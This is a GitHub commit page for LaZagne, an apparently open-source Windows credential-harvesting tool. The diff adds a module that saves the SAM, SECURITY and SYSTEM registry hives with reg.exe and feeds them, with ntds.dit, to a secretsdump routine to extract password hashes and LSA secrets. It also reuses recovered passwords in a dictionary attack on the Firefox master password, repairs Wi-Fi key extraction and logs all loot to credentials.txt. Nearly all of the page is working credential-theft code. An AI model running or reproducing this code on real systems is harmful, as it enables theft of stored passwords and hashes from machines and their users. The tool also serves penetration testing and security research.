Skip to content

Commit

Permalink
Fix bugs (wifi + ie), adding Windows hashes and secrets
Browse files Browse the repository at this point in the history
  • Loading branch information
@AlessandroZ
AlessandroZ committed Apr 27, 2015
1 parent 1f91b4d commit e4c84e1
Show file tree
Hide file tree
Showing 9 changed files with 1,243 additions and 9 deletions.
3 changes: 2 additions & 1 deletion Windows/src/LaZagne/config/constant.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -2,7 +2,7 @@
class constant():
folder_name = 'results'
MAX_HELP_POSITION = 27
CURRENT_VERSION = 0.1
CURRENT_VERSION = 0.2
output = None
file_logger = None

Expand All @@ -23,3 +23,4 @@ class constant():

# total password found
nbPasswordFound = 0
passwordFound = []
2 changes: 1 addition & 1 deletion Windows/src/LaZagne/config/write_output.py
View file
Original file line number Diff line number Diff line change
@@ -1 +1 @@
from constant import constantfrom time import gmtime, strftimeimport os, getpass, socketimport loggingimport WConiofrom config.header import Header# --------------------------- Functions used to write ---------------------------def write_header(): time = strftime("%Y-%m-%d %H:%M:%S", gmtime()) header = '''|====================================================================|\r\n| |\r\n| Credentsials discovery |\r\n| |\r\n| ! BANG BANG ! |\r\n| |\r\n|====================================================================|\r\n\r\n- Date: ''' + time + '''\n\r- Username: ''' + getpass.getuser() + ''' \r\n- Hostname: ''' + socket.gethostname() + ''' \r\n\r\n------------------------------ Results ------------------------------\r\n\r\n''' open(constant.folder_name + os.sep + 'credentials.txt',"a+b").write(header)def write_footer(): footer = '\n[+] %s passwords have been found.\r\nFor more information launch it again with the -v option\r\n\r\n' % str(constant.nbPasswordFound) open(constant.folder_name + os.sep + 'credentials.txt',"a+b").write(footer) def write_credentials(pwdFound, category): tmp = "############ %s passwords ############\r\n\r\n" % category for pwd in pwdFound: for p in pwd.keys(): tmp = str(tmp) + str(p) + ": " + str(pwd[p]) + "\r\n" tmp = str(tmp) + "\r\n" open(constant.folder_name + os.sep + 'credentials.txt',"a+b").write(tmp) def checks_write(values, category): if values: if constant.output == 'txt': try: write_credentials(values, category) logging.info('[+] Credentials stored successfully on the file: %s\\credentials.txt\n' % constant.folder_name) except: logging.info('Couldn\'t write the results file\n')# --------------------------- End of functions used to write ---------------------------# --------------------------- Output functions ---------------------------def print_footer(): footer = '\n[+] %s passwords have been found.\nFor more information launch it again with the -v option\n' % str(constant.nbPasswordFound) logging.info(footer)# print output if passwords have been founddef print_output(software_name, pwdFound): if pwdFound: # if the debug logging level is not apply => print the title if logging.getLogger().isEnabledFor(logging.DEBUG) == False: Header().title_info(software_name) toWrite = [] for pwd in pwdFound: lower_list = [s.lower() for s in pwd.keys()] password = [s for s in lower_list if "password" in s] key = [s for s in lower_list if "key" in s] # for the wifi # No password found if not password and not key: print_debug("FAILED", "Password not found !!!") else: print_debug("OK", "Password found !!!") toWrite.append(pwd) constant.nbPasswordFound += 1 for p in pwd.keys(): logging.info("%s: %s" % (p, pwd[p])) print # write credentials into a text file checks_write(toWrite, software_name) else: logging.debug("[!] No passwords found\n")def print_error(message): WConio.textcolor(WConio.LIGHTRED) logging.debug('[!] %s\n' % message) WConio.textcolor(WConio.LIGHTGREY)# def print_debug(message): # logging.debug('[!] %s\n' % message) def print_debug(error_level, message): if error_level == 'ERROR': WConio.textcolor(WConio.LIGHTRED) logging.debug('[ERROR] %s\n' % message) WConio.textcolor(WConio.LIGHTGREY) elif error_level == 'INFO': logging.debug('[INFO] %s\n' % message) # print when password is not found elif error_level == 'WARNING': WConio.textcolor(WConio.CYAN) logging.debug('[WARNING] %s\n' % message) WConio.textcolor(WConio.LIGHTGREY) # print when password is not found elif error_level == 'FAILED': WConio.textcolor(WConio.LIGHTRED) logging.info(message) WConio.textcolor(WConio.LIGHTGREY) # print when password is found elif error_level == 'OK': WConio.textcolor(WConio.GREEN) logging.info(message) WConio.textcolor(WConio.LIGHTGREY) elif error_level == 'DEBUG': logging.debug('%s\n' % message) else: logging.debug('[%s] %s' % (error_level, message))# --------------------------- End of output functions ---------------------------
from constant import constantfrom time import gmtime, strftimeimport os, getpass, socketimport loggingimport WConiofrom config.header import Header# --------------------------- Functions used to write ---------------------------def write_header(): time = strftime("%Y-%m-%d %H:%M:%S", gmtime()) header = '''|====================================================================|\r\n| |\r\n| Credentsials discovery |\r\n| |\r\n| ! BANG BANG ! |\r\n| |\r\n|====================================================================|\r\n\r\n- Date: ''' + time + '''\n\r- Username: ''' + getpass.getuser() + ''' \r\n- Hostname: ''' + socket.gethostname() + ''' \r\n\r\n------------------------------ Results ------------------------------\r\n\r\n''' open(constant.folder_name + os.sep + 'credentials.txt',"a+b").write(header)def write_footer(): footer = '\n[+] %s passwords have been found.\r\n\r\n' % str(constant.nbPasswordFound) open(constant.folder_name + os.sep + 'credentials.txt',"a+b").write(footer) def write_credentials(pwdFound, category): tmp = "############ %s passwords ############\r\n\r\n" % category for pwd in pwdFound: for p in pwd.keys(): tmp = str(tmp) + str(p) + ": " + str(pwd[p]) + "\r\n" tmp = str(tmp) + "\r\n" open(constant.folder_name + os.sep + 'credentials.txt',"a+b").write(tmp) def checks_write(values, category): if values: if constant.output == 'txt': try: write_credentials(values, category) logging.info('[+] Credentials stored successfully on the file: %s\\credentials.txt\n' % constant.folder_name) except: logging.info('Couldn\'t write the results file\n')# --------------------------- End of functions used to write ---------------------------# --------------------------- Output functions ---------------------------def print_footer(): footer = '\n[+] %s passwords have been found.\n' % str(constant.nbPasswordFound) if logging.getLogger().isEnabledFor(logging.DEBUG) == False: footer += 'For more information launch it again with the -v option\n' logging.info(footer)# print output if passwords have been founddef print_output(software_name, pwdFound): if pwdFound: # if the debug logging level is not apply => print the title if logging.getLogger().isEnabledFor(logging.DEBUG) == False: Header().title_info(software_name) toWrite = [] for pwd in pwdFound: lower_list = [s.lower() for s in pwd.keys()] password = [s for s in lower_list if "password" in s] key = [s for s in lower_list if "key" in s] # for the wifi # No password found if not password and not key: print_debug("FAILED", "Password not found !!!") else: print_debug("OK", "Password found !!!") toWrite.append(pwd) # Store all passwords found on a table => for dictionnary attack if masterpassword set constant.nbPasswordFound += 1 try: if password: constant.passwordFound.append(pwd['Password']) elif key: constant.passwordFound.append(pwd['key']) except: pass for p in pwd.keys(): logging.info("%s: %s" % (p, pwd[p])) print # write credentials into a text file checks_write(toWrite, software_name) else: logging.debug("[!] No passwords found\n")def print_error(message): WConio.textcolor(WConio.LIGHTRED) logging.debug('[!] %s\n' % message) WConio.textcolor(WConio.LIGHTGREY)def print_debug(error_level, message): if error_level == 'ERROR': WConio.textcolor(WConio.LIGHTRED) logging.debug('[ERROR] %s\n' % message) WConio.textcolor(WConio.LIGHTGREY) elif error_level == 'INFO': logging.debug('[INFO] %s\n' % message) # print when password is not found elif error_level == 'WARNING': WConio.textcolor(WConio.CYAN) logging.debug('[WARNING] %s\n' % message) WConio.textcolor(WConio.LIGHTGREY) # print when password is not found elif error_level == 'FAILED': WConio.textcolor(WConio.LIGHTRED) logging.info(message) WConio.textcolor(WConio.LIGHTGREY) # print when password is found elif error_level == 'OK': WConio.textcolor(WConio.GREEN) logging.info(message) WConio.textcolor(WConio.LIGHTGREY) elif error_level == 'DEBUG': logging.debug('%s\n' % message) else: logging.debug('[%s] %s' % (error_level, message))# --------------------------- End of output functions ---------------------------
Expand Down
11 changes: 8 additions & 3 deletions Windows/src/LaZagne/laZagne.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -20,6 +20,7 @@
# windows
from softwares.windows.network import Network
from softwares.windows.dot_net import Dot_net
from softwares.windows.secrets import Secrets
# sysadmin
from softwares.sysadmin.filezilla import Filezilla
from softwares.sysadmin.cyberduck import Cyberduck
Expand Down Expand Up @@ -54,6 +55,7 @@
modules = {}
# windows
modules['windows'] = {}
modules['windows']['secrets'] = Secrets()
modules['windows']['dotnet'] = Dot_net()
modules['windows']['network'] = Network()
# Wifi
Expand Down Expand Up @@ -99,7 +101,7 @@ def output():
os.makedirs(constant.folder_name)
write_header()
del args['write']

def verbosity():
# write on the console + debug file
if args['verbose']==0: level=logging.INFO
Expand All @@ -112,6 +114,8 @@ def verbosity():
stream.setFormatter(formatter)
root = logging.getLogger()
root.setLevel(level)
# print help(root)
root.handlers = []
root.addHandler(stream)

del args['verbose']
Expand Down Expand Up @@ -191,8 +195,6 @@ def runBrowsersModule():
def runAllModules():
time_to_sleep = 0

runWindowsModule()
time.sleep(time_to_sleep)
runWifiModule()
time.sleep(time_to_sleep)
runSVNModule()
Expand All @@ -206,6 +208,8 @@ def runAllModules():
runChatsModule()
time.sleep(time_to_sleep)
runBrowsersModule()
time.sleep(time_to_sleep)
runWindowsModule()

# prompt help if an error occurs
class MyParser(argparse.ArgumentParser):
Expand Down Expand Up @@ -308,6 +312,7 @@ def error(self, message):
#1.6- Parent parser: windows
PWindows = argparse.ArgumentParser(add_help=False,formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=constant.MAX_HELP_POSITION))
PWindows._optionals.title = 'Windows credentials (credential manager, etc.)'
PWindows.add_argument('-s', action='store_true', dest='secrets', help='Windows secrets (hashes, lsa secrets, etc.)')
PWindows.add_argument('-d', action='store_true', dest='dotnet', help='domain visible network (.Net Passport) Passwords')
PWindows.add_argument('-n', action='store_true', dest='network', help='generic network credentials')

Expand Down
5 changes: 3 additions & 2 deletions Windows/src/LaZagne/softwares/browsers/mozilla.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -281,10 +281,11 @@ def found_masterpassword(self):

# 500 most used passwords
if 'd' in self.toCheck:
num_lines = (len(get_dico())-1)
wordlist = get_dico() + constant.passwordFound
num_lines = (len(wordlist)-1)
print_debug('ATTACK', '%d most used passwords !!! ' % num_lines)

for word in get_dico():
for word in wordlist:
if self.is_masterpassword_correct(word):
print_debug('FIND', 'Master password found: %s\n' % word.strip())
return True
Expand Down
5 changes: 5 additions & 0 deletions Windows/src/LaZagne/softwares/wifi/wifi.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -40,6 +40,11 @@ def retrieve_password(self):
# read temp file containing all passwords found
pwdFound = []
filepath = tempfile.gettempdir() + os.sep + 'TEMP123A.txt'

# the file has not been created yet
if not os.path.exists(filepath):
time.sleep(5)

if os.path.exists(filepath):
cp = RawConfigParser()
cp.read(filepath)
Expand Down
3 changes: 1 addition & 2 deletions Windows/src/LaZagne/softwares/wifi/wifipass.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -16,7 +16,6 @@ def retrieve_password(self):
directory = ''
if 'ALLUSERSPROFILE' in os.environ:
directory = os.environ['ALLUSERSPROFILE'] + os.sep + 'Microsoft\Wlansvc\Profiles\Interfaces'

# for windows Vista or higher
if os.path.exists(directory):
passwordFound = False
Expand Down Expand Up @@ -68,7 +67,7 @@ def retrieve_password(self):
tmp = ''
cpt = 1
for pwd in pwdFound:
tmp = '[wifi%s]\r\n' % str(cpt)
tmp += '[wifi%s]\r\n' % str(cpt)
cpt += 1
for p in pwd.keys():
tmp = str(tmp) + str(p) + '=' + str(pwd[p]) + '\r\n'
Expand Down
57 changes: 57 additions & 0 deletions Windows/src/LaZagne/softwares/windows/secrets.py
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,57 @@
import subprocess
import os, sys
from secretsdump import retrieve_hash
from config.header import Header
from config.write_output import print_debug
from ctypes import *
import logging

class Secrets():
def __init__(self):
self.sysFile = ['sam', 'security', 'system']
self.address = 'LOCAL'
self.ntds = os.environ['systemroot'] + os.sep + 'ntds' + os.sep + 'ntds.dit'
if not os.path.exists(self.ntds):
self.ntds = None
self.history = True

# check if files have been saved
def check_existing_systemFiles(self):
for f in self.sysFile:
if not os.path.exists('%s.save' % f):
return False
return True

def delete_existing_systemFiles(self):
for f in self.sysFile:
os.remove('%s.save' % f)

def retrieve_password(self):
# Need admin privileges
if not windll.Shell32.IsUserAnAdmin():
if logging.getLogger().isEnabledFor(logging.DEBUG) == True:
Header().title_info('Windows Secrets')
print_debug('ERROR', '[!] This script should be run as admin!')
return

# print the title
Header().title_info('Windows Secrets')

# if hives already exists
if self.check_existing_systemFiles():
self.delete_existing_systemFiles() # delete it

# save system hives
for f in self.sysFile:
subprocess.Popen('reg.exe save hklm\%s %s.save' % (f,f) , shell=True, stdout=subprocess.PIPE).stdout.read()

if not self.check_existing_systemFiles():
print_debug('WARNING', 'Remove existing hive files and launch it again.')
return

retrieve_hash(self.address, '%s.save' % self.sysFile[2], '%s.save' % self.sysFile[1], '%s.save' % self.sysFile[0], self.ntds, self.history)

# remove hives files
self.delete_existing_systemFiles()


Loading

0 comments on commit e4c84e1

Please sign in to comment.